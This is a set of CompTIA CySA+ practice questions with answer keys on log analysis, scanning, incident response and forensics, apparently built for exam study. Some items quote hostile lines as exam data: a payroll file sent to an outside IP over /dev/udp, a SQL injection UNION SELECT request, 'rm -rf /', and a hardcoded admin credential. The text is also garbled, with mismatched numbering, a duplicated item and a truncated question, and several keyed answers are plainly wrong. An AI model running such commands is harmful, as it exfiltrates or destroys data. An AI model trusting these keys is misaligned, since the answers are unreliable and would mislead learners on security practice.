  1. A security analyst is reviewing SIEM logs and notices several hundred alerts related to a server are reporting for the usual time period when users are not working on the server. The analyst believes the data collected in the SIEM tools is being collected incorrectly. Which of the following should the security administrator do to verify the data collected is properly identified?

a. Set up FTP service and redirect all logs to a central data location
b. Configure all devices to use an NTP server to sync with the SIEM tool
c. Change the SIEM data collector to pull log files on an hourly basis.
d. Adjust the security permission on the log files to read-only to prevent changes.

A

b. Configure all devices to use an NTP server to sync with the SIEM tool

229
Q
  1. During an annual compliance and vulnerability scan, the security assurance company discovers that 95% of its customer’s firewall and proxy settings have been changed from the company’s hardening standards to the factory default setting. This is a dramatic difference from the typical number of vulnerabilities found. Which of the following has MOST likely happened?

a. The vendor has swept the networks with an uncredentialed scan.
b. The network has been compromised and is under attack.
c. A network administrator inadvertently restored archived configuration files
d. The security standards have changed.

A

c. A network administrator inadvertently restored archived configuration files

230
Q
229. An excerpt from the process list of a known compromised host is shown below:

    Process          Parent
    smss.exe         System
    services.exe     wininit.exe
    svchost          services.exe
    lsass.exe        wininit.exe
    explorer.exe
    firefox.exe      explorer.exe
    AcroRd32.exe     firefox.exe
    powershell.exe   AcroRd32.exe
    Winword.exe      explorer.exe
    winlogon.exe

Which of the following would be the MOST plausible scenario describing what happened?

a. The user opened an infected PDF file from a personal webmail account.
b. The user installed an infected version of Mozilla Firefox from a flash drive.
c. An attacker used mimikatz to steal Kerberos tokens from the lsass.exe process.
d. An insider is running a PowerShell script to steal user credentials.

A

a. The user opened an infected PDF file from a personal webmail account.

231
Q
  1. A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to a competitor’s landing pages. Which of the following actions should the company’s security team take to determine the cause of the issue and minimize the scope of impact?

a. Engage a third party to provide penetration testing services to see if an exploit can be found.
b. Check DNS records to ensure Cname or alias records are in place for the subdomain.
c. Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected.
d. Check the DNS records to ensure a correct MX record is established for the subdomain.

A

b. Check DNS records to ensure Cname or alias records are in place for the subdomain

232
Q
  1. Given the following vulnerability summary:
    Source: US-CERT/NIST
    Overview
    Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impacts via crafted use of the mmap and bpf system calls.
    CVSS v3 base score: 7.8

Of which of the following exploitation strategies does the above vulnerability make use?

a. Attempting to put more data in a memory location than it can hold
b. Referencing a memory location after it is no longer being used
c. Causing the return from a subroutine to jump to a random address
d. Temporarily or indefinitely disrupting services to intended users

A

b. Referencing a memory location after it is no longer being used

233
Q
  1. Malware was detected on a corporate network with more than 100 workstations and servers per branch. The malware tried to connect to all available network shares and shared folders it could detect on the network, and then started to encrypt the documents. To stop any further damage, the file servers are taken offline until the situation is fixed. The security analyst team must identify which computers are infected and then eradicate the malware. The company has full packet captures, NetFlow, and firewall logs of every branch. Which of the following would be the FASTEST way to identify the affected workstations?

a. Use the packet capture and search in a packet analyzer for workstations that are connected to the file servers. Sort them chronologically, and then proceed to review those workstations.
b. Use the netflow capture to filter by port used, identify workstations with multiple connections, and sort by the number of connections and destinations. Then, proceed to review those workstations.
c. Use the firewall logs to detect connections to central file servers and proceed to review the event logs on each workstation.
d. Enable file access auditing on the file servers, set all files with read-only permissions, and put the servers back online to then detect anomalous activity on the file servers’ logs.

A

b. Use the netflow capture to filter by port used, identify workstations with multiple connections, and sort by the number of connections and destinations. Then, proceed to review those workstations.

234
Q
  1. A security analyst is reviewing the vulnerability scan results of the company’s hardened web servers. The results indicate there are no high-risk vulnerabilities, even though the web server version is very old, with known vulnerabilities that have a CVSS score of 7 and higher, running on port 443. Which of the following is the MOST likely cause of this error?

a. TLS scans require the private key.
b. A credentialed scan is required when TLS is in use.
c. The server header reported a wrong version.
d. Scores must exceed 8 to be classified as high.

A

d. Scores must exceed 8 to be classified as high.

235
Q
  1. ** An FTP server in the DMZ is used to provide non-sensitive media files to customers all over the world. The user accounts on the server are shared by various groups. An administrator complains that processor utilization has been pegged for the last few days by what appears to be a common system process. Which of the following would be an analyst’s BEST course of action?

a. Disconnect the network cable immediately, capture a memory image to begin the offline analysis, and block inbound TCP port 21 on the firewall.
b. Identify any recent users added to the system, remove or disable those user accounts, and install Fail2ban on the server.
c. Make a copy of the system process for further analysis, kill and delete it from the system, and remove any files created in the last seven days.
d. Verify the validity of the system process, check the log files for any malicious activity, and initiate a restart of the server.

A

d. Verify the validity of the system process, check the log files for any malicious activity, and initiate a restart of the server.

236
Q
  1. During a cyber incident response, an employee is discovered to be involved in the company’s Big Data analytics compromise. The employee has ties to an adversary in the business market of data analytics. The employee is caught and apprehended. Which of the following professionals would be the FIRST to handle the situation involving the employee?

a. Police
b. Human resources
c. Lawyer
d. Security officer

A

b. Human resources

237
Q
  1. A security administrator at an IT firm is receiving reports that files are being uploaded to a company’s web server by an unauthorized user. The security administrator investigates this event, and the company starts to receive phone calls about selling robots. After reviewing several files on the web server, the administrator finds the following encoded file that is getting an HTTP GET from several sources every minute:
    A:4087 : (s:32:"/is-buying-robots-on-line-legal/";i:0;s:32:"/robots-online-expressdelivery/";i:5209:s:32:"/buy-robots-without-downpayment/";i:10014;s:25:"/trial-forrobots/";i:15115;s:30:"/generic-robots-fast/";i:19480;s:25:"/lowest-price-for-robots/";i:24601;s:28:"/robotscanada-where-to-buy/";i:29650;s:17:"/name-for-robots/"i:34799;s:28:"/order-robot-online/";i:39908;s

Which of the following is MOST likely occurring within the file?

a. Artificial intelligence is creating redirects for where to buy robots.
b. Item numbers are created within the company’s online sales catalog to display robots.
c. Directories are created that have the text string “robot” in them.
d. It is creating meta tags with the word “robots” that search engines are discovering.

A

d. It is creating meta tags with the word “robots” that search engines are discovering.

238
Q
  1. An organization is working with a number of value-added resellers to scope and budget an upcoming networking infrastructure overhaul. During the vendor selection process, which of the following should the organization require vendors to provide to mitigate security issues that may arise in the supply chain?

a. Business continuity plan
b. SLAs with OEM suppliers
c. Installation and configuration procedures
d. Hardware authenticity verification procedures
e. Vendor risk analysis procedures

A

e. Vendor risk analysis procedures

239
Q
  1. Which of the following groups is responsible for refereeing an engagement between a mock attacker and actual defender of an enterprise network during a cyber training exercise to secure a corporate environment?

a. White team
b. Green team
c. Blue team
d. Red team

A

a. White team

240
Q
  1. A security analyst is reviewing the results of an external penetration test about the wireless network at a company. The report finds the following vulnerabilities:
    The tester could access corporate resources through the open wireless network named “Cafe”.
    The wireless network at Building 1 can be accessed in the parking lot.
    Two hidden SSIDs named “Admincompany R” and “Testcompany R” were discovered.
    A standalone wireless printer network was found in Building 2.
    Which of the following remediation solutions needs to be in place FIRST?

a. Turn off the wireless printer network at Building 2.
b. Identify if there is a business justification for the wireless broadcast range for Building 1.
c. Disable hidden SSIDs for all wireless networks.
d. Establish a VLAN segregation for the “Cafe” wireless network.

A

d. Establish a VLAN segregation for the “Cafe” wireless network.

241
Q
  1. A system analyst is performing a preliminary port map of a client’s network using Nmap. The analyst is not getting results back, and a message states:

“Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn” for all hosts, even on IP addresses hosting the corporate website. A cloud-hosted test server can be scanned.

Which of the following is the MOST likely cause of this issue and the recommended next step?

a. There is an Internet outage between the analyst’s workstation and the client’s network. Wait an hour and run the Nmap scan again.
b. The client’s advanced next-generation firewall immediately identified the probes, and the workstation is blacklisted. Ask the client to put an IP “Any” “Any” entry for the workstation’s IP.
c. The client’s network is temporarily down for a maintenance window. Contact the client and rescan with Nmap when out of the maintenance window.
d. The client’s advanced next-generation firewall is filtering either ICMP Type 0 or ICMP Type 8 packets. Rerun the scan skipping host discovery.

A

d. The client’s advanced next-generation firewall is filtering either ICMP Type 0 or ICMP Type 8 packets. Rerun the scan skipping host discovery.

242
Q
  1. An analyst wants to build a lab with multiple workstations to practice penetration testing in a test environment. Which of the following will provide the analyst with the MOST penetration-testing-specific features?

a. Nessus
b. Qualys
c. Metasploit
d. Nexpose

A

c. Metasploit

243
Q
  1. A security analyst has been monitoring phishing test results over the past 90 days. During this time, employees have responded to test phishes that seem to involve their job responsibilities, but they have rarely responded to test phishes that relate to personal gain or curiosity. Which of the following should the analyst recommend to BEST help minimize the impact of future attempts?

a. A new email security appliance with more aggressive filters.
b. Automated reporting for each failure of the phishing tests.
c. A new DLP appliance to prevent data exfiltration.
d. Additional training that focuses on awareness and trends

A

d. Additional training that focuses on awareness and trends

244
Q
  1. An organization needs to implement a vulnerability management process and prioritize scans based on the server function and types of data processed on those servers. The following is a summary of the organization’s subnets and servers:
    192.168.1.0/30   File servers storing corporate marketing materials
    192.168.1.8/29   File servers storing client PII
    192.168.1.16/29  Web servers that process sales data but have no data resident on the servers
    192.168.1.32/28  Database servers storing company sales data but nothing else
    192.168.1.64/27  Development servers with application source code and nothing else

Which of the following servers would receive the HIGHEST priority for a vulnerability scan?

a. 192.168.1.3
b. 192.168.1.8
c. 192.168.1.11
d. 192.168.1.38
e. 192.168.1.99

A

b. 192.168.1.8

245
Q
  1. An investigation office seized and packaged electronic media evidence to ship to a specialized lab. Which of the following will help to identify data integrity loss?

a. Write blockers
b. Crime tape
c. Chain of custody
d. Tamper-proof seals
e. Incident form

A

d. Tamper-proof seals

246
Q
  1. A junior forensic analyst is asked to take an image of a workstation that was compromised during a recent breach. The head of the CIRT is most concerned with ensuring that digital evidence is preserved during analysis. Which of the following tools would BEST accomplish this goal?

a. Hashing algorithm
b. Sealed evidence bag
c. Time stamping
d. Write blocker

A

b. Sealed evidence bag

247
Q
  1. While examining server logs, a security analyst notices an additional process is running that is not required for the server’s function. Additionally, a key process on the server began crashing and automatically restarting dozens of times within a short time period until a patch was applied. Which of the following BEST describes what has happened?

a. The affected process is a result of a zero-day attack.
b. A busy server updated itself automatically.
c. The crashes made the security logs inaccurate.
d. A known vulnerability has been exploited.

A

d. A known vulnerability has been exploited.

248
Q
247. ** A security analyst is trying to interpret the results of the following scan:

    nmap -sS 192.168.1.11 -D 192.168.1.13 -p 22,135,139,445,3389,4445,14000
    Host is up (0.0010s latency)
    Port       State   Service
    22/tcp     closed  openssh
    135/tcp    closed  msrpc
    139/tcp    closed  netbios-ssn
    445/tcp    closed  microsoft-ds
    3389/tcp   closed  ms-term-serv
    4445/tcp   closed  upnotifyp
    14000/tcp  closed  scotty-ft

Which of the following BEST describes the target?

a. 192.168.1.11 is running Linux.
b. 192.168.1.11 is running Windows.
c. 192.168.1.13 is running Linux.
d. 192.168.1.13 is running Windows.

A

a. 192.168.1.11 is running Linux.

249
Q
  1. The accounts payable department is having trouble processing a wire transfer online. Ann, an accountant, types in her password four times without success. Joe, her assistant, attempts to enter his password, but it fails as well. Which of the following best describes how the IT department should respond FIRST?

a. Segment the accounting department’s network and begin reviewing log files.
b. Notify law enforcement and initiate the incident response process.
c. Notify senior management and await further instruction before processing.
d. Contact the wire transfer company out-of-band and have the passwords changed.

A

d. Contact the wire transfer company out-of-band and have the passwords changed.

250
Q
  1. An analyst notices the following vulnerabilities frequently occurred in scans over the past year:
    OpenSSL < 1.1.0b
    Apache Tomcat Default Password
    These vulnerabilities frequently occur on servers that are part of a DevOps process and are easy to fix. Which of the following would identify why they keep showing up?

a. The DevOps process requires a specific version and default passwords for easy deployment to Tomcat.
b. These are development servers, so the services may be providing incorrect data to the scanner.
c. DevOps images need to be updated to the latest software versions.
d. The vulnerability trend over a year indicates the presence of an API.

A

d. The vulnerability trend over a year indicates the presence of an API.

251
Q
250. While testing an organization’s password policy compliance, an analyst views the following report from a web server:

    Employee ID   Password Hash
    656           1h738kb894nmd7653nb345576hg3j485
    657           121h8kb8een6d7f5u73ew290pmn44466
    658           1h738kb894nmd7653nb345576hg3j485
    659           a17e8kk8v4n7d7663nb34hh79h73j485

Which of the following is the BEST recommendation to address these findings?

a. Update the password policy to ensure password complexity.
b. Migrate from MD5 to SHA-256 hashing.
c. Salt the employee’s passwords prior to hashing.
d. Store hashes in an encrypted format.

A

c. Salt the employee’s passwords prior to hashing.

252
Q
  1. A company has been listed on the “plaintextoffenders.com” website as storing customer passwords in cleartext. This was discovered when customers reset their current passwords by clicking on a “forgotten password” link. Which of the following technical controls should the company implement on customer passwords to remediate this? (Select TWO).

a. SHA-256 hashing
b. Password salting
c. Reversible encryption
d. AES-GCM encryption
e. Disablement of password resets
f. Implementation of TLS

A

b. Password salting

d. AES-GCM encryption

253
Q
  1. 2/17/2017 09:01:10 PM EDT dmayfair Invalid Password
    2/17/2017 09:01:14 PM EDT dmayfair Invalid Password
    2/17/2017 09:01:15 PM EDT amyers Invalid Password
    2/17/2017 09:01:22 PM EDT dmayfair Invalid Password
    2/17/2017 09:01:28 PM EDT dmayfair Invalid Password
    2/17/2017 09:01:35 PM EDT dmayfair Invalid Password
    2/17/2017 09:01:35 PM EDT amyers Password accepted
    2/17/2017 09:01:50 PM EDT dmayfair Password accepted
    The analyst next checks the identity management system and finds the following:
    Full Name       User ID    Role
    Aaron Myers     amyers     Executive, CFO
    Diane Mayfair   dmayfair   Office Staff, Reception
    Doug Smith      dsmith     Office Staff, Clearing

Which of the following should the analyst do NEXT?

a. Ask the help desk to contact Diane Mayfair for a password reset.
b. Follow up with the Chief Financial Officer (CFO) regarding his login issues.
c. Check logs for activities by the dmayfair account.
d. Contact Doug Smith to set up an account in the system.

A

b. Follow up with the Chief Financial Officer (CFO) regarding his login issues.

254
Q
  1. During an incident investigation, a cybersecurity analyst finds the following assertion flagged by the WAF and originating from a known mailing address. The targeted system is an internet-facing IdP.
    https://idp.comptia.org

admin

A

d. The assertion indicates an attacker is trying to take advantage of an XML External Entity attack.

255
Q
  1. A server is showing signs of irregular communication with a known threat actor’s IP range. The Chief Information Security Officer (CISO) has asked the analyst to capture a session with Wireshark for further analysis. The packet capture shows very small amounts of data being sent over ports 53 and 80 with “zero payload”. Which of the following common network symptoms does this represent?

a. Beaconing
b. Unusual traffic spiking
c. Data exfiltration
d. Malformed packet

A

a. Beaconing

256
Q
  1. After a data leak, a company requires the sanitization of hard drives, rendering them unusable. Which of the following methods should the company use for the removal of data remanence?

a. Deleting
b. Reformatting
c. Degaussing
d. Zeroing

A

c. Degaussing

257
Q
256. The Chief Information Security Officer (CISO) has asked the security analyst to examine abnormally high processor utilization on a key server. The output below is from the company’s research and development (R and D) server:

    Hour      Processor  Busy      Processor   Processor        Processor     System       Server
              address    time (%)  user (sec)  emulation (sec)  system (sec)  wait (msec)
    16:01:31  0          18.75     610         432              66            2823         Research.01.R&D.srv
              1          29.55     765         370              298           2151         Research.01.R&D.srv
              2          16.65     542         382              58            3030         Research.01.R&D.srv
              3          13.86     453         322              46            6160         Research.01.R&D.srv
    17:03:31  0          18.99     625         447              59            2205         Research.01.R&D.srv
              1          22.52     605         342              215           1932         Research.01.R&D.srv
              2          14.23     503         313              41            1785         Research.01.R&D.srv
              3          12.81     417         299              32            1823         Research.01.R&D.srv
    18:05:17  0          9.63      420         395              41            1287         Research.01.R&D.srv
              1          13.35     302         294              62            1015         Research.01.R&D.srv
              2          6.23      252         241              21            987          Research.01.R&D.srv
              3          5.41      238         197              13            884          Research.01.R&D.srv
    16:06:52  0          88.81     2440        1728             264           14115        Research.01.R&D.srv
              1          76.23     3060        1240             901           10755        Research.01.R&D.srv
              2          72.35     2168        987              216           10284        Research.01.R&D.srv
              3          58.99     1912        802              208           9758         Research.01.R&D.srv

Which of the following actions should the security analyst take FIRST?

a. Initiate an investigation
b. Isolate the R&D server
c. Reimage the server
d. Determine availability

A

a. Initiate an investigation

258
Q
  1. During a tabletop exercise, it is determined that a security analyst is required to ensure patching and scan reports are available during an incident, as well as documentation of all critical systems. To which of the following stakeholders should the analyst provide the reports?

a. Management
b. Affected vendors
c. Security operations
d. Legal

A

a. Management

259
Q
  1. Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .exe and .dll files are blocked. Which of the following tools would generate these logs?

a. Antivirus
b. HIPS
c. Firewall
d. Proxy

A

b. HIPS

260
Q
  1. An organization subscribes to multiple third-party security intelligence feeds. It receives a notification from one of these feeds indicating a zero-day malware attack is impacting SQL servers prior to SP 2. The notification also indicates that infected systems attempt to communicate to external IP addresses on port 2718 to download the additional payload. After consulting with the organization’s database administrator, it is determined that there are several SQL servers that are still on SP 1, and none of the SQL servers would normally communicate over port 2718. Which of the following is the BEST mitigation step until the SQL servers can be upgraded to SP 2 with minimal impact on the network?

a. Create alert rules on the IDS for all outbound traffic on port 2718 from IP addresses of the SQL servers running SQL SP1.
b. On the organization’s firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1.
c. Place all the SQL servers running SP 1 on a separate subnet. On the firewalls, create a new rule blocking the connection to destination addresses external to the organization’s network.
d. On the SQL Servers running SP 1, install vulnerability scanning software.

A

c. Place all the SQL servers running SP 1 on a separate subnet. On the firewalls, create a new rule blocking the connection to destination addresses external to the organization’s network.

261
Q
  1. Which of the following is the BEST way to share incident-related artifacts to provide non-repudiation?

a. Secure email
b. Encrypted USB drives
c. Cloud containers
d. Network folders

A

a. Secure email

262
Q
  1. A security analyst received a threat report regarding a new TTP against Linux that utilizes a malicious process running with elevated privileges. Which of the following commands would MOST efficiently gather the appropriate information for analysis?

a. ls -alh /usr/bin/
b. ls | grep root
c. tasklist | FIND root
d. ps aux | grep root

A

d. ps aux | grep root

263
Q
  1. While reviewing web server logs, a security analyst notices the following code:
    GET http://testphp.comptia.org/profiles.php?id=-1 UNION SELECT 1,2,3 HTTP/1.1
    Host: testphp.comptia.org
    Which of the following would prevent this code from performing malicious actions?

a. Performing web application penetration testing
b. Requiring the application to use input validation
c. Disabling the use of HTTP and requiring the use of HTTPS
d. Installing a network firewall in front of the application

A

a. Performing web application penetration testing

264
Q
  1. A company has multiple firewalls on its network. The security analyst remotes into each firewall to review daily logs and discovers blocks of the logs are missing between midnight and 6:00 a.m. Nothing else is discovered during the examination. After reviewing the findings, which of the following should the analyst report to management?

a. The missing log files are not a concern, as nothing else was discovered missing. Management should consider changing the passwords for administrators who no longer work at the company so they cannot access the firewall.
b. The missing log files are purged after-hours to preserve space on the firewalls. Management should consider purchasing larger drives to prevent the log from being purged.
c. The missing log files pertain to someone who gained access and cleaned the tracks. Company management should deploy a SIEM system to offload the logs for protection.
d. The missing files indicate something has happened, but no details are discovered during the examination. The analyst should notify management an anomaly was found, but no damage occurred.

A

b. The missing log files are purged after-hours to preserve space on the firewalls. Management should consider purchasing larger drives to prevent the log from being purged.

265
Q
  1. A penetration tester recently came across an executable file that was developed in-house and used by administrators to remotely administer sensitive systems. The tester ran ‘strings’ on the file and came up with the following output:
    This program cannot be run in DOS mode.
    .text
    .data
    Ntdll.dll
    Shell32.dll
    User32.dll
    Net use \\windc1\admin /user:windomain:admin1 p@ssw0rd1 /persistent

    Which of the following recommendations should an analyst make to the testers?

a. Load the secure versions of standard Windows DLLs only.
b. Utilize base64 to enclose the string with the net use command.
c. Perform static application security testing on all binaries.
d. Use the Windows DPAPI to encrypt the password string.

A

d. Use the Windows DPAPI to encrypt the password string.

266
Q
  1. A technician at a company’s retail store notifies an analyst that disk space is being consumed at a rapid rate on several registers. The uplink back to the corporate office is also saturated frequently. The retail location has no Internet access. An analyst then observes several occasional IPS alerts indicating a server at corporate has been communicating with an address on a watchlist. NetFlow data shows large quantities of data transferred at those times. Which of the following is MOST likely causing the issue?

a. A credit card processing file was declined by the card processor and caused transaction logs on the registers to accumulate longer than usual.
b. Ransomware on the corporate network has propagated from the corporate network to the registers and has begun encrypting files there.
c. Ransomware on the corporate network has propagated from the corporate network to the registers from the IP address indicated on the watchlist, generating large amounts of traffic and data storage.
d. Malware on a register is scraping credit card data and staging it on a server at the corporate office before uploading it to an attacker-controlled command and control server.

A

d. Malware on a register is scraping credit card data and staging it on a server at the corporate office before uploading it to an attacker-controlled command and control server.

267
Q
  1. A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

a. nmap -A -sV 192.168.1.235
b. cat payrol.csv > /dev/udp/123.145.123.456/53
c. cat /etc/passwd
d. mysql -h 192.168.1.235 -u test -p

A

b. cat payrol.csv > /dev/udp/123.145.123.456/53

268
Q
  1. Which of the following should be found within an organization’s acceptable use policy?

a. Passwords must be eight characters in length and contain at least one special character.
b. Customer data must be handled properly, stored on company servers, and encrypted when possible.
c. Administrator accounts must be audited monthly, and inactive accounts should be removed.
d. The consequences of violating the policy could include discipline up to and including termination.

A

d. The consequences of violating the policy could include discipline up to and including termination.

269
Q
  1. New regulations have come out that require a company to conduct vulnerability scans. Not wanting to be found with a vulnerability during an audit, the company wants the most accurate and complete vulnerability scan. Which of the following BEST meets this objective?

a. Regression scan
b. Port scan
c. SCAP scan
d. Agent-based scan

A

d. Agent-based scan

270
Q
  1. A company has a large number of users who need to access corporate resources or networks from various locations. Many users have VPN access to the network, as well as wireless Internet access from BYOD approved systems, tablets, and smartphones. The users can also access corporate resources from an Internet-facing web portal; however, all of these services require a separate credential. Which of the following should the cybersecurity analysts recommend to aggregate and audit all logins while allowing the corporate directory services credentials to be shared across all of the services?

a. SAML
b. Kerberos
c. SSO
d. RADIUS

A

c. SSO

271
Q
  1. An organization wants to perform network scans to identify active hosts and vulnerabilities. Management places the highest priority on scans that mimic how an attack would progress. If time and resources allow, subsequent scans can be performed using different techniques and methods. Which of the following scan types and sequences would BEST suit the organization’s requirements?

a. Non-credentialed scans followed by credentialed scans
b. Credentialed scans followed by compliance scans
c. Compliance scans followed by credentialed scans
d. Compliance scans followed by non- credential scans

A

a. Non-credentialed scans followed by credentialed scans

272
Q
  1. Which of the following vulnerabilities is MOST commonly found on a web proxy server?

a. Cache poisoning
b. Cross-site scripting
c. Directory traversal
d. SQL Injection

A

a. Cache poisoning

273
Q
  1. A data center manager just received an SMS alert that a server cage was successfully accessed using an authorized code. The manager does not recall receiving a multifactor by email for scheduled maintenance on servers in the cage. Which of the following is the FIRST step the manager should take?

a. Check the change management tags at the earliest convenience to determine if the change was authorized
b. Remote access to the server and change the password to prevent the x from accessing the system
c. Request a firewall administrator to implement an ACL to contain any potential damage
d. Call the security guard to investigate the situation

A

d. Call the security guard to investigate the situation

274
Q
  1. In comparison to non-industrial IT vendors, ICS equipment vendors generally:

a. Rely less on proprietary code in their hardware products
b. Have more mature software development models
c. Release software updates less frequently
d. Provide more extensive vulnerability reporting

A

c. Release software updates less frequently

275
Q
  1. A security administrator is reviewing the following results of a vulnerability scan from a single host:

    BugTrack ID   Name
    BID 19849     Ubuntu 5.10 / 6.06 LTS / 6.10 Mozilla vulnerabilities (USN-361)
    BID 10708     Microsoft Windows Task Scheduler remote overflow (841873)
    BID 14514     Vulnerability in printer spooler service could allow remote code execution (896423)
    BID 14513     Vulnerability in plug-and-play service could allow remote code execution (899588)

Which of the following BEST describes these scan results?

a. The Mozilla vulnerability is a false positive
b. The Task Scheduler vulnerability is a false positive
c. The plug-and-play vulnerability is the lower priority
d. The printer spooler is the highest priority

A

a. The Mozilla vulnerability is a false positive

276
Q
  1. An organization is working with a number of value-added resellers to scope and budget an upcoming networking infrastructure overhaul. During the vendor selection process, which of the following should the organization require vendors to provide to mitigate security issues that may arise in the supply chain?

a. Business continuity plan
b. SLAs with OEM suppliers
c. Installation and configuration procedures
d. Hardware authenticity verification procedures
e. Vendor risk analysis procedures

A

e. Vendor risk analysis procedures

277
Q
  1. An analyst performed the following activities:

    - Review the security logs
    - Install a surveillance camera
    - Analyze trend reports

Which of the following job responsibilities is the analyst performing (Select TWO)?

a. Direct a security incident
b. Reduce the attack surface of the system
c. Implement monitoring controls
d. Harden network devices
e. Prevent unauthorized access
f. Encrypt the devices

A

b. Reduce the attack surface of the system

c. Implement monitoring controls

278
Q
  1. The IT department at a growing law firm wants to begin using a third-party vendor for vulnerability monitoring and mitigation. The executive director of the law firm wishes to outline assumptions and expectations between the two companies. Which of the following documents would MOST likely be created to contain this information?

a. SLA
b. MOU
c. SOW
d. NDA

A

b. MOU

279
Q
  1. A security analyst runs a scan and discovers several vulnerabilities. Which of the following should the analyst recommend to be fixed FIRST?

a. Unknown Service Detection: Banner Retrieval
b. FTP Server Detection
c. Samba NDR MS-RPC Request Heap-Based Remote Buffer Overflow
d. HTTP Methods Allowed (per-directory)
e. Web Server Uses Plain Text Authentication Forms

A

c. Samba NDR MS-RPC Request Heap-Based Remote Buffer Overflow

280
Q
  1. After a forensic investigation, several hard drives are to be sanitized and reused. Which of the following commands will securely erase these drives and reset them to factory specifications?

a. dd bs=4096 if=/dev/zero of=/dev/[mount]
b. Format [drive location]: /pl
c. mkfs.ext3 /dev/[mount]
d. rm -rf /

A

a. dd bs=4096 if=/dev/zero of=/dev/[mount]

281
Q
  1. A company wants a security assessment of its corporate network, which is located in two buildings. The company does not want anyone to be aware of the assessment but wants the results provided to the CEO when the assessment is completed. Which of the following is the FIRST thing the company should do to set up the assessment?

a. Gather network information from the system administrator before the assessment
b. Ensure the company has signed and given permission for the assessment
c. Ask how they want the documentation of the assessment delivered
d. Ask where the team is to be located during the assessment

A

d. Ask where the team is to be located during the assessment

282
Q
  1. During user acceptance testing of a company’s online banking application, the user enters some sample data and receives the following output:

FinancialWebApp.AccountDetails: Err2367, Database mismatch

At FinancialWebApp.SetPIIinDB() in C:\FinancialWebApp\DBObjects.cs:line 24
At FinancialWebApp.FormatData() in C:\FinancialWebApp\FinObjects.cs:line 14
At FinancialWebApp.UserInput() in C:\FinancialWebApp\FinObjects.cs:line 10
At FinancialWebApp.Program.Main(String[] args) in C:\FinancialWebApp\Program.cs:line 13

Which of the following recommendations should be made to the software developers as a result of this output?

a. Stress the application
b. Ensure a mechanism exists for detailed log analysis
c. Sanitize user input from the debug logs
d. Use error handlers that do not display debugging information

A

d. Use error handlers that do not display debugging information

283
Q
  1. Which of the following describes the role blue team members are assigned to fulfill?

a. Discover vulnerabilities in the deep and dark web and report them to management
b. Attack the company system to discover vulnerabilities and advise management
c. Conduct penetration testing and report findings to management
d. Protect and defend company assets and advise management

A

d. Protect and defend company assets and advise management